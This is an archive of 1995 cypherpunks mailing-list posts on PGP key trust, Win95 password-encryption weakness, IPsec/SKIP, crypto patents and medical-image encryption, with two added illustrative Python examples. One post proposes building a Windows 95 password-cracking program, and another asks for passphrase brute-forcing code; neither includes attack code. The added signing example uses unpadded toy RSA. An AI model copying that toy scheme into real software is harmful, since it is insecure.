In-Reply-To: <199511290808.AAA14767@netcom2.netcom.com>
Message-ID: <9511291640.AA00683@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 00:10:16 -0800
>From: frantz@netcom.com (Bill Frantz)

>It is hard to see how to record the information about how much I trust the
>recipient's systems security.

I don't see a computer-understandable way to do that either -- but you have
provided an example of a human-readable way in your prior paragraph:

>			     I just added a key to my key ring that I will
>use for sending confidential data to a client site.  I trust that no one can
>access the secret key who is not also inside their firewall.  However, the
>key is on a multi-user system, so I do not trust that it is accessible to
>only one person.  Since the data I intend to send will be publicly
>available inside the firewall, I don't have to trust more than the
>firewall.

You could sign a small message consisting of:

	a) that paragraph
	b) the subject public key (or its good-enough hash)
	c) your public key (or its good-enough hash)

with your key and let that attribute declaration do the job.  It would only
be humans who could interpret it, but in the end it's humans who need to.
The computer should be able to find and use (b) and (c) -- but leave the
human to interpret (a).

I grant that they'd rather let the machine do the thinking for them, but
that may not be possible -- especially at this time in the evolution of
generally available security, before we learn patterns to codify in
computer-understandable abbreviations.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
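
The attribute declaration Carl describes above, as an added example that is not part of the original message: a record carrying (a) the free-text statement, (b) a hash of the subject key and (c) a hash of the signer's key, signed so that software can locate (b) and (c) while a human reads (a). The field names, the record layout, the sample key material and the toy RSA key (a stand-in for a real PGP key, far too small for real use) are all assumptions made for the example.

```python
import hashlib

# Toy RSA key built from two Mersenne primes so the example runs offline.
# It stands in for the signer's real key and is far too small for real use.
P, Q, E = 2**127 - 1, 2**89 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))      # private exponent
SIGNER_PUB = (N, E)

# Constructed stand-in for the client site's public key material.
SUBJECT_KEY = b"constructed-client-site-public-key"

# (a) The human-readable part, condensed from the paragraph quoted above.
STATEMENT = (
    "I trust that no one can access the secret key who is not also inside\n"
    "their firewall. The key is on a multi-user system, so I do not trust\n"
    "that it is accessible to only one person."
)


def key_hash(material: bytes) -> str:
    """Hash used to name a key inside the record: parts (b) and (c)."""
    return hashlib.sha256(material).hexdigest()


def pub_bytes(pub) -> bytes:
    """Serialise a toy public key (n, e) so that it can be hashed."""
    n, e = pub
    return f"{n:x}:{e:x}".encode()


def build_record(statement: str, subject_key: bytes, signer_pub) -> bytes:
    """Two machine-readable header lines, a blank line, then the free text."""
    header = (
        f"Subject-Key-Hash: {key_hash(subject_key)}\n"
        f"Signer-Key-Hash: {key_hash(pub_bytes(signer_pub))}\n\n"
    )
    return (header + statement + "\n").encode()


def digest_int(record: bytes, n: int) -> int:
    """SHA-256 of the whole record, reduced into the toy modulus."""
    return int.from_bytes(hashlib.sha256(record).digest(), "big") % n


def sign(record: bytes, d: int, n: int) -> int:
    """Textbook RSA signature over the record digest (no padding: toy only)."""
    return pow(digest_int(record, n), d, n)


def parse_record(record: bytes) -> dict:
    """What the computer can use: the two key hashes. The rest is for people."""
    head, _, body = record.decode().partition("\n\n")
    fields = dict(line.split(": ", 1) for line in head.splitlines())
    return {
        "subject": fields["Subject-Key-Hash"],
        "signer": fields["Signer-Key-Hash"],
        "statement": body.strip(),
    }


def verify(record: bytes, sig: int, signer_pub) -> bool:
    """Signature must check AND field (c) must name the key that verified it."""
    n, e = signer_pub
    if pow(sig, e, n) != digest_int(record, n):
        return False
    return parse_record(record)["signer"] == key_hash(pub_bytes(signer_pub))


def notes_for_key(subject_key: bytes, signed_records, signer_pub) -> list:
    """Statements from validly signed records about subject_key, for display
    to the human just before that key is used."""
    wanted = key_hash(subject_key)
    notes = []
    for record, sig in signed_records:
        if verify(record, sig, signer_pub):
            fields = parse_record(record)
            if fields["subject"] == wanted:
                notes.append(fields["statement"])
    return notes


if __name__ == "__main__":
    record = build_record(STATEMENT, SUBJECT_KEY, SIGNER_PUB)
    signature = sign(record, D, N)
    print(record.decode())
    print("signature valid:", verify(record, signature, SIGNER_PUB))
```
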




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 30 Nov 1995 05:03:55 +0800
To: cypherpunks@toad.com
Subject: break microsoft!!!
Message-ID: <199511291949.LAA04349@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


re: the recent message that windows 95 has weak password encryption
due to a 32 bit random seed sent to RC4--

this seems like another EXCELLENT opportunity for some major 
cypherpunks press coverage and feather-in-the-cap accolades.

remember, the last break of the Netscape RC4 algorithm (or was it
MD5?) got front page NYT coverage and reverberated throughout the
entire media.

a "cypherpunk" accomplishing the same thing for Microsoft would 
potentially get *major* notice.

I imagine a short .exe file that when run on the proper computer
prints out passwords as it cracks them. this would get the
attention of a LOT of people.


I have the MS C++ compiler, and if someone could discuss the difficulty
of writing this proposed "exe" file, the rough time required to break
the keys, and other considerations (physical access to server computer
required?)  and maybe point to code pieces on the
net (RC4 etc.) to pull it off, I might start the effort myself.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Thu, 30 Nov 1995 03:18:45 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <m0tKrau-00090tC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I have security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>PGP is really not the issue.  The issue is more my security and the
>environment that I use PGP in.  I don't have a trusted machine to run PGP
>on.  Anyone who wants to can come up to machine and copy my secret keyring
>or they can even watch me typing my password in. 
>
>So, I don't fool myself, and I don't use PGP, except for things like
>exchanging a one-time pad with someone when I've already sent the message
>out across another delivery mechanism, like on a floppy delivered by
>courier. 
>
>Alice de 'nonymous ...

You're a bonehead.  On the one hand, you FAIL to stop or dramatically reduce
claimed spoofings of your notes by using PGP (which would almost certainly
work perfectly for this limited purpose) yet you claim that you'll only
trust PGP in a limited scenario of courier-delivered data!

Talk about "penny-wise and pound foolish"!  

Wake up, idiot!  The purpose of encryption and signing and such is to REDUCE
problems, ideally to zero but if not to some adequately small value.  To
fail to use signing when there is no ongoing problem is risky; to not use
signing when there is a  serious continuing problem is downright lunatic.
That sets up an irresolvable contradiction:  On the one hand, you're willing
to tolerate a continuing problem, yet on the other you claim that your
standards are so high that you won't use a system unless the probability of
security essentially precludes a loss of security.

Now can you see why we're laughing?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 30 Nov 1995 05:13:16 +0800
To: cypherpunks@toad.com
Subject: Re: The future will be easy to use
Message-ID: <199511292001.MAA16554@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:30 PM 11/28/95 EST, Carl Ellison <cme@TIS.COM> wrote:

>BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
>is that I trust that key (by personal meeting, by attribution, by message
>association, ...).  A signed attribute record would let me record that
>information for myself as well as for others.

That would be a useful feature, even if it's just an unstructured text file.
There is a way to do it now, though it's inefficient and hokey -
create multiple key-signing keys, with name fields indicating the attribute,
sign them with your main key, and use the appropriate one of them to
sign keys for people.  For instance, I have a key named
"Bill Stewart Unauthenticated Pseudonym Signing Key <stewarts@ix.netcom.com>"
which I use to sign keys of significantly lower trust than my normal key;
you could do similar things for higher-quality certification.
This does increase the depth of the web-of-trust required, which is less
of a problem for low-trust keys than for keys you actually care about :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 30 Nov 1995 05:17:59 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Elliptic curves, patent status?
In-Reply-To: <199511290717.XAA29808@blob.best.net>
Message-ID: <Pine.SUN.3.91.951129120448.15920A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, James A. Donald wrote:

> > [are there patents that cover all public key cryptography?]
>
> No, but RSA will litigate you with the objective of
> inflicting extravagant legal costs regardless.

RSADSI no longer owns the Stanford patents (Hellman-Merkle, 
Diffie-Hellman) which they used to claim covered all public key 
cryptography.  Those patents now belong to Cylink, who seems to be less 
litigious.

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Usuario Acceso2 <acceso2@diatel.upm.es>
Date: Thu, 30 Nov 1995 07:31:22 +0800
To: cypherpunks@toad.com
Subject: Question on modular exponents
Message-ID: <230*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>
MIME-Version: 1.0
Content-Type: text/plain


Hi CP's:

I'd be pleased if someone explained this to me ASAP:

How could I demonstrate that _ (g^a)^b (mod p) = g^{(a*b) mod q} mod p _
when g's order in Zp is q?

The same question remains for addition. I have the feeling the demonstration
must be similar.

Best.

Jaime
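
An added worked check of the identity asked about above (not part of the original post): the module docstring carries the one-line argument, and the functions confirm it exhaustively in a small group and show what goes wrong when the exponent is reduced by a modulus that is not a multiple of g's order. The values p = 23, g = 2 (order 11) and g = 5 (order 22) and all function names are constructed for the example.

```python
"""Why exponents of g can be reduced mod q when g has order q in Z_p*.

Write a*b = k*q + r with r = (a*b) mod q.  Then
    (g^a)^b = g^(a*b) = (g^q)^k * g^r = 1^k * g^r = g^r   (mod p),
because g^q = 1 (mod p) by the definition of order.  The same step with
a+b = k*q + r gives  g^a * g^b = g^((a+b) mod q)  (mod p).
"""


def element_order(g: int, p: int) -> int:
    """Smallest q >= 1 with g^q = 1 (mod p), for prime p and 0 < g < p."""
    x, q = g % p, 1
    while x != 1:
        x = (x * g) % p
        q += 1
    return q


def product_rule_holds(g: int, p: int) -> bool:
    """Check (g^a)^b = g^((a*b) mod q) (mod p) for all 0 <= a, b < 2q."""
    q = element_order(g, p)
    return all(
        pow(pow(g, a, p), b, p) == pow(g, (a * b) % q, p)
        for a in range(2 * q)
        for b in range(2 * q)
    )


def sum_rule_holds(g: int, p: int) -> bool:
    """Check g^a * g^b = g^((a+b) mod q) (mod p) for all 0 <= a, b < 2q."""
    q = element_order(g, p)
    return all(
        (pow(g, a, p) * pow(g, b, p)) % p == pow(g, (a + b) % q, p)
        for a in range(2 * q)
        for b in range(2 * q)
    )


def mismatches(g: int, p: int, m: int, bound: int = 30) -> list:
    """Pairs (a, b) below bound where reducing the exponent mod m is WRONG.

    Empty exactly when m is a multiple of the order of g (for a large enough
    bound); in particular m = p - 1 always works, m = p generally does not.
    """
    return [
        (a, b)
        for a in range(bound)
        for b in range(bound)
        if pow(g, a * b, p) != pow(g, (a * b) % m, p)
    ]


if __name__ == "__main__":
    p, g = 23, 2
    q = element_order(g, p)
    print(f"order of {g} mod {p} is {q}")
    print("product rule holds:", product_rule_holds(g, p))
    print("sum rule holds:    ", sum_rule_holds(g, p))
    print("reduce mod q:   ", len(mismatches(g, p, q)), "mismatches")
    print("reduce mod p-1: ", len(mismatches(g, p, p - 1)), "mismatches")
    print("reduce mod p:   ", len(mismatches(g, p, p)), "mismatches")
```

The exponent arithmetic therefore lives in Z_q (or Z_{p-1}), never in Z_p, which is the distinction the mod-p row makes visible.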





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Barrett/CheckFree Corporation <Andrew_Barrett@checkfree.com>
Date: Thu, 30 Nov 1995 01:52:28 +0800
To: www-buyinfo <cypherpunks@toad.com>
Subject: Re: (cpx) Re:(fwd) Like FV with Crypto ... 'Cept Different ...
Message-ID: <9511292039.AA0442@6thstreetcheckfree.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky writes (quoting propaganda forwarded to Punks by Robert):

>>  WebTrader can be used as a stand-alone Internet application or in
>>conjunction with SBT's Pro Series 3.0i accounting software.  WebTrader has a
>>suggested retail price of $1,295.
                           ^^^^^^^^^^^^^^^^

>They can't be serious. Why would you want to pay $1,300 for a payment
>system, when you can get an Ecash merchant account for a fraction of what
>Checkfree is charging?

Not all merchants wishing to transact on the Web are as knowledgeable or 
sophisticated as the Punks on the different options. The offering includes a 
Web presence and payment processing, hassle free. No energy expenditure 
required. No need to develop an instant competency in electronic commerce. If a 
prospective web merchant has neither in place, I imagine the cost might be 
attractive. I also imagine that, like any other business in the world, SBT 
charges what they think the market will bear.

Please note that CheckFree did not price the offering - they do the CC 
processing for SBT at some agreed upon cost to SBT. SBT sets the price for the 
offering in order to recover that cost, as well as their own, and establish 
some sort of margin.

And by the way, I had nothing to do with the project, so I beg you not to direct 
flames thisaway, should any decide flames are called for. Hey man, I just work 
here....  :)

AJ.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 01:56:52 +0800
To: ipsec@ans.net
Subject: NRL IPsec/IPv6 code
Message-ID: <199511291742.MAA03253@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



An early version of NRL's 4.4BSDlite based IPsec/IPv6 implementation
is up on ftp.c2.org in an appropriately export controlled directory.

This isn't an official distribution -- I'm just putting up the code I
got because there has been some interest in it. I've been hacking it
in to NetBSD of late.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 30 Nov 1995 05:29:43 +0800
To: cypherpunks@toad.com
Subject: Code to brute-force PGP passphrase?
Message-ID: <Pine.ULT.3.91.951129123917.17268A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have an old, forgotten PGP key for which I would like to issue a
revocation certificate (or maybe I stole somebody else's with an identical
name; who could tell?). I can put the key on a Mac, PC, or UNIX machine
(various flavors). I think I have a pretty good idea what the middle of
the passphrase contains, so I'd guess there are only about 2,000
possibilities to be explored. 

Anybody have code for any platform for cracking this? Alternatively, I
could just give you the key and wait for the answer. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 30 Nov 1995 03:29:47 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
In-Reply-To: <199511291534.KAA02780@jekyll.piermont.com>
Message-ID: <doug-9510291859.AA029810760@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry sez:

>
>Tom Markson writes:
>> Check out http://skip.incog.com.  We've released the source to the SKIP
>> key management and IP layer encryption package for SunOs 4.x.
>
>SKIP is a non-standard being pushed by Sun.
>

Correct me if I'm wrong, but isn't Sun trying to make it a standard
(in competition with Photuris) ?

Can I also assume that the IPV6 stuff requires pretty extensive kernel
mods? (Not bad, but a very definite consideration)

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 30 Nov 1995 02:56:06 +0800
To: Joey Grasty X3697 P6611 <jgrasty@pts.mot.com>
Subject: Re: Judge won't drop Netcom from suit
In-Reply-To: <30BA3798.2781E494@pts.mot.com>
Message-ID: <9511291823.AA26757@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



The article looks like it was written from the scientologists press release.
The judgement was posted in alt.religion.scientology. The actual judgement was 
far from a success for the scientologists. 

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 30 Nov 1995 06:01:10 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: break microsoft!!!
In-Reply-To: <199511291949.LAA04349@netcom13.netcom.com>
Message-ID: <Pine.ULT.3.91.951129132555.17268F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Be careful not to sound too gleeful, lest you play into the evil nasty 
hacker stereotype. Keep the focus on the fact that real encryption is 
both possible and highly desired; the bad guys are lazy programmers and 
the US Government.

I have sent a pointer to the sci.crypt article to the win95netbugs list, 
which currently has eight Microsoft employees and nine major computer 
magazines on it. I might mention it to Microsoft's "technical people" 
when they drop by next week to address our networking concerns.

The answer, for anyone desiring one, is to turn off Win95's "multiple 
user profiles" features, turn off "encrypted password caching," and 
advertise the fact that Win95 is a totally insecure single-user OS, and 
will continue to be so as long as it uses the 1970's-vintage FAT file 
system. If real security is not available, the goal should be to 
eliminate the false sense of security that encourages people to leave 
sensitive files out in the open.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Thu, 30 Nov 1995 04:34:44 +0800
To: cypherpunks@toad.com
Subject: Re: SKIP Source Release is out!
In-Reply-To: <199511291926.OAA03467@jekyll.piermont.com>
Message-ID: <doug-9510291935.AA029910760@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>
>Doug Hughes writes:
>> >Tom Markson writes:
>> >> Check out http://skip.incog.com.  We've released the source to the SKIP
>> >> key management and IP layer encryption package for SunOs 4.x.
>> >
>> >SKIP is a non-standard being pushed by Sun.
>> 
>> Correct me if I'm wrong, but isn't Sun trying to make it a standard
>> (in competition with Photuris) ?
>
>The IETF has many sorts of standards. It explicitly has a way to
>standardize things that the IETF doesn't think are a good idea but
>which should have the ability to interoperate if you do them.
>
>My opinion is that it is fairly clear that Photuris is the key
>management system people will be using, although it is going to have
>to evolve to work with a real network wide certificate database
>infrastructure. SKIP isn't going to be the standard.
>
>> Can I also assume that the IPV6 stuff requires pretty extensive kernel
>> mods? (Not bad, but a very definite consideration)
>
>IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help
>it. It's part of the IP stack, you know.
>
I knew it was a safe assumption. :)

>BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- it's also usable
>in IPv4. We were careful about how we architected that.
>
>The NRL code implements IPsec for both v4 and for the v6 stack it
>comes with. In fact, the NRL code is primarily an IPv6 implementation
>-- they just implemented IPSEC as a side effect.
>

'Tis a shame, because SKIP is available right now and will, if past history
is any indication, become the de facto standard on Sun platforms because it
is readily available, and the IPV6 stuff isn't, nor probably will be soon
because even those with the source code are not permitted to give out mods
to this source (in the case of SunOS - I believe). However, a loadable
kernel module would be very nice with the IPv6 stuff in it. Unfortunately,
I have very little experience with loadable kernel modules of this scope,
nor the source code to use as a reference, should the loadable modules be
feasible.


--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 03:05:49 +0800
To: cypherpunks@toad.com
Subject: Medical Records
Message-ID: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Here's something that may make attempts such as Clipper a bit harder to
mandate, if this (non-escrowed, I believe) system becomes common. It should
also provide some pressure for relaxation of ITAR.
	-Allen

      (c) 1995 Copyright Nando.net
      (c) 1995 Reuter Information Service
      
[...]

   A security system developed at the University of California at San
   Francisco prevents unauthorized access to x-rays and other medical
   images transmitted via computer networks. A scientist described the
   system in a report prepared for a radiologists' convention here.

[...]
   
   Stephen Wong, assistant professor of radiology and bioengineering, and
   colleagues developed the system for the picture archiving and
   communications system used at the university to store and transmit
   digitized medical images.
   
   He said the authenticity of the images as well as patient
   confidentiality must be protected.
   
   "We have to make sure that the digital information and images are not
   altered accidentally or surreptitiously," Wong said. "In addition,
   x-rays and other imaging studies are part of the patient's medical
   record and must be protected from unauthorized access."
   
   The system uses mathematical formulas or codes to scramble the images
   through encryption. It involves a "two-key" system -- one code enables
   public access but a second, private code is required to unscramble the
   information.
   
   The private code, known only to the individual to whom the information
   is transmitted, is 1,024 computer bits long, Wong said.
   
   In emergencies where fast transmission is needed, the unscrambled
   image is transmitted with a digital "fingerprint," a smaller code that
   assures the intended viewer that no one has altered the original
   image.
   
   Wong prepared his report for the annual meeting of the Radiological
   Society of North America.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 30 Nov 1995 03:07:04 +0800
To: cypherpunks@toad.com
Subject: Harbinger (sp?) system
Message-ID: <01HY7U5HY1WK8WYVEV@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Sorry if this question has been asked and I missed it, but does anyone
know how their system works?
	Thanks,
	-Allen


      (c) 1995 Copyright Nando.net
      (c) 1995 Cox News Service
      
   ATLANTA (Nov 29, 1995 - 09:44 EST) -- Harbinger Corp. has announced
   new software aimed at making the Internet safe for commerce, a move
   that could dramatically reshape the small company.

[...]

   TrustedLink, the product announced Tuesday but not available until
   next year, will let firms connect via the Net as well as through
   Harbinger networks, he said.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Thu, 30 Nov 1995 03:31:34 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU (E. ALLEN SMITH)
Subject: Re: Medical Records
In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
Message-ID: <199511291909.OAA16016@homeport.org>
MIME-Version: 1.0
Content-Type: text


	It seems that they use signatures & hashes; nice work, a good
advance for medical records storage, but I'd ask how keys are managed,
and also what prevents me exploiting the 'hash-only' mode of sending
in what I'm claiming to be an emergency.  (Not that these
invalidate the system; they're just interesting areas to work on.)

E. ALLEN SMITH wrote:

|    "We have to make sure that the digital information and images are not
|    altered accidentally or surreptitiously," Wong said. "In addition,
|    x-rays and other imaging studies are part of the patient's medical
|    record and must be protected from unauthorized access."
|    
|    The system uses mathematical formulas or codes to scramble the images
|    through encryption. It involves a "two-key" system -- one code enables
|    public access but a second, private code is required to unscramble the
|    information.
|    
|    The private code, known only to the individual to whom the information
|    is transmitted, is 1,024 computer bits long, Wong said.
|    
|    In emergencies where fast transmission is needed, the unscrambled
|    image is transmitted with a digital "fingerprint," a smaller code that
|    assures the intended viewer that no one has altered the original
|    image.


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 30 Nov 1995 04:18:32 +0800
To: Doug Hughes <Doug.Hughes@eng.auburn.edu>
Subject: Re: SKIP Source Release is out!
In-Reply-To: <doug-9510291859.AA029810760@netman.eng.auburn.edu>
Message-ID: <199511291926.OAA03467@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Doug Hughes writes:
> >Tom Markson writes:
> >> Check out http://skip.incog.com.  We've released the source to the SKIP
> >> key management and IP layer encryption package for SunOs 4.x.
> >
> >SKIP is a non-standard being pushed by Sun.
> 
> Correct me if I'm wrong, but isn't Sun trying to make it a standard
> (in competition with Photuris) ?

The IETF has many sorts of standards. It explicitly has a way to
standardize things that the IETF doesn't think are a good idea but
which should have the ability to interoperate if you do them.

My opinion is that it is fairly clear that Photuris is the key
management system people will be using, although it is going to have
to evolve to work with a real network wide certificate database
infrastructure. SKIP isn't going to be the standard.

> Can I also assume that the IPV6 stuff requires pretty extensive kernel
> mods? (Not bad, but a very definite consideration)

IPSEC, SKIP, IPv6, etc., all require kernel mods. You can't help
it. It's part of the IP stack, you know.

BTW, IPv6 uses IPSEC, but IPSEC isn't only for IPv6 -- it's also usable
in IPv4. We were careful about how we architected that.

The NRL code implements IPsec for both v4 and for the v6 stack it
comes with. In fact, the NRL code is primarily an IPv6 implementation
-- they just implemented IPSEC as a side effect.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Thu, 30 Nov 1995 04:22:49 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Medical Records
In-Reply-To: <01HY7U2Z5PSG8WYVEV@mbcl.rutgers.edu>
Message-ID: <9511291929.AA01140@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Exactly! We need to point out that crypto is essential to protect us from 
criminals. Some criminals may use crypto technology, just as they use faxes and 
portable phones. But just because a portable phone could be used by a drug 
dealer does not mean they should be illegal.

Jim Bidzos just pinned a rather cool poster to the wall of the 3rd floor coffee 
lounge here at MIT today. It has a woman on a phone labeled "escrow enabled" and 
then the spooks listening in from a post marked "escrow integrity center". The 
motto is "A good Marketing Agency Listens to its Customers - We Hear You!"

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Thu, 30 Nov 1995 04:22:34 +0800
To: cypherpunks@toad.com
Subject: So easy... in the future.
In-Reply-To: <9511291354.AA16998@sulphur.osf.org>
Message-ID: <Pine.LNX.3.91.951129142107.741C-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've found mkpgp to be a very useful tool, and an easy to use add on for 
'pine' and pgp. But for those that prefer a GUI E-Mail application,
I think it would be great if Netscape were to integrate some 
more security in that portion of their navigator. Or perhaps a third 
party could add this in by creating a PGP 'Plugin' for Netscape...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 30 Nov 1995 04:52:25 +0800
To: Adam Hupp <ahupp@primenet.com>
Subject: Re: key for Alice as promised (not)
In-Reply-To: <199511290315.UAA26439@usr4.primenet.com>
Message-ID: <Pine.SUN.3.91.951129143454.8834A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, Adam Hupp wrote:

> >Can you imagine??  I'm simply not willing to fool myself into thinking 
> >that I have security by posting a key and using PGP.
> 
> Unless you can post some proof that PGP is insecure, stop insisting it is.

Hold on a minute.  Alice is, here, 100% correct.

If I use PGP to read messages and there's a videocamera trained on the 
keyboard, and other people have access to the machine, PGP is not 
secure.  Similarly, if PGP is on a computer which other people may use 
without my supervision, they can  monitor keystrokes, etc. and PGP is not 
secure.

A chain is only as strong as its weakest link; Alice recognizes this, and 
makes no claim that PGP itself is the weak link.  The weak link is the 
physical security of the system which Alice claims to use.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Thu, 30 Nov 1995 07:10:28 +0800
To: cypherpunks@toad.com
Subject: Response to ping re: CJR
Message-ID: <199511292240.OAA09940@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I just got a message on my answering machine from Sam Capino. He said
they are working on an answer to my CJR. They had hoped to get it out by
now, but were set back by "the furlough." I had called him about a
week ago to check up on the status, but at the time only got his
answering machine.

Of course, the original 15 days have passed, but I'm perfectly willing
to let that slide since I'm not completely sure that the CJR was
submitted using exactly the right process.

Just thought you'd like to know.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 30 Nov 1995 04:58:50 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511290707.XAA24211@blob.best.net>
Message-ID: <Pine.SUN.3.91.951129144206.8834B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 Nov 1995, James A. Donald wrote:

> At 03:30 PM 11/28/95 EST, Carl Ellison wrote:
> > Of course.  This isn't the base case.  We would have some keys which I sign
> > based on my own personal knowledge; things handed to me by people I know;
> > some possibly published in the paper where the real key owner would see the
> > claim and be able to contest it.
> 
> You are making the same erroneous assumption that Phil made when he
> designed the Web of trust:  You assume that it is important and 
> interesting to link key ID's to physical bodies.  This is usually
> not the case:  Linking key ID's to home web pages etc is not only 
> easier -- it is also usually more interesting and important.

Not if you're encrypting a Credit Card transaction to ship physical 
goods.  In that case, I'm going to certainly want to link a key ID to a 
physical body (or at least address) if I'm the seller, so as to limit 
liability as best I can.

While this might not ultimately be important, early adopters of crypto on 
the net seem in general to be financially interested with an eye to limiting 
liability. They want linked keys.

There's a public-relations aspect to crypto which most systems not 
linking name -> key id fail.  This is the step necessary to get it out 
the door.

Unfortunately, it also appears counter to CP philosophy.

However, if you have optional linking of ID and name, shippers will only 
ship to keys with such attributes. Because just ID and address, it could 
be a "hit and run" type attack shipped to a safe maildrop.

Jon
------------------------------------------------------------------------------
